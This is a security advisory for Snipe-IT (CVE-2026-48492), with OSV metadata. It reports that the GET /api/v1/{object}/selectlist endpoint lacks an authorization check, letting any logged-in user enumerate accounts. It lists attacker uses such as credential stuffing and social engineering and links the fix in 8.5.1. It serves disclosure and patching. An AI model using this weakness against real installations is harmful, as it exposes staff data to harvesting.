GHSA-F3C5-6CW8-FG57
Vulnerability from github – Published: 2026-06-23 22:11 – Updated: 2026-06-23 22:11
VLAI
Summary
Snipe-IT's selectlist visibility is too permissive
Details
Impact
The GET /api/v1/{object}/selectlist API endpoint is missing an authorization check. Any user who can log into Snipe-IT - regardless of permissions - can retrieve a paginated list of all user accounts using only their web session cookie. No API token or elevated permissions are required. This exposes usernames, display names, employee numbers, and user IDs for every active account in the system if FMCS is not enabled, and within the company they belong to if FMCS is enabled.
What an attacker can do with a valid login and zero permissions:
- Enumerate all active user accounts by paginating through the endpoint
- Harvest usernames for credential stuffing or password spray attacks
- Collect employee numbers and full names for social engineering
- Perform indirect email enumeration via the search parameter
- Map user IDs for use in further enumeration against other endpoints
This vulnerability is exploitable only by users who have a working login to the Snipe-IT system.
Patches
https://github.com/grokability/snipe-it/commit/4f943d4a7ab8e53f3d9e32770602d1118bab005f
Severity
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "snipe/snipe-it"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.5.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48492"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-23T22:11:13Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\nThe GET /api/v1/{object}/selectlist API endpoint is missing an authorization check. Any user who can log into Snipe-IT - regardless of permissions - can retrieve a paginated list of all user accounts using only their web session cookie. No API token or elevated permissions are required. This exposes usernames, display names, employee numbers, and user IDs for every active account in the system if FMCS is not enabled, and within the company they belong to if FMCS is enabled.\n\n### What an attacker can do with a valid login and zero permissions:\n- Enumerate all active user accounts by paginating through the endpoint\n- Harvest usernames for credential stuffing or password spray attacks\n- Collect employee numbers and full names for social engineering\n- Perform indirect email enumeration via the search parameter\n- Map user IDs for use in further enumeration against other endpoints\n\nThis vulnerability is exploitable only by users who have a working login to the Snipe-IT system. \n\n### Patches\nhttps://github.com/grokability/snipe-it/commit/4f943d4a7ab8e53f3d9e32770602d1118bab005f",
"id": "GHSA-f3c5-6cw8-fg57",
"modified": "2026-06-23T22:11:13Z",
"published": "2026-06-23T22:11:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grokability/snipe-it/security/advisories/GHSA-f3c5-6cw8-fg57"
},
{
"type": "WEB",
"url": "https://github.com/grokability/snipe-it/commit/4f943d4a7ab8e53f3d9e32770602d1118bab005f"
},
{
"type": "PACKAGE",
"url": "https://github.com/grokability/snipe-it"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "Snipe-IT\u0027s selectlist visibility is too permissive"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…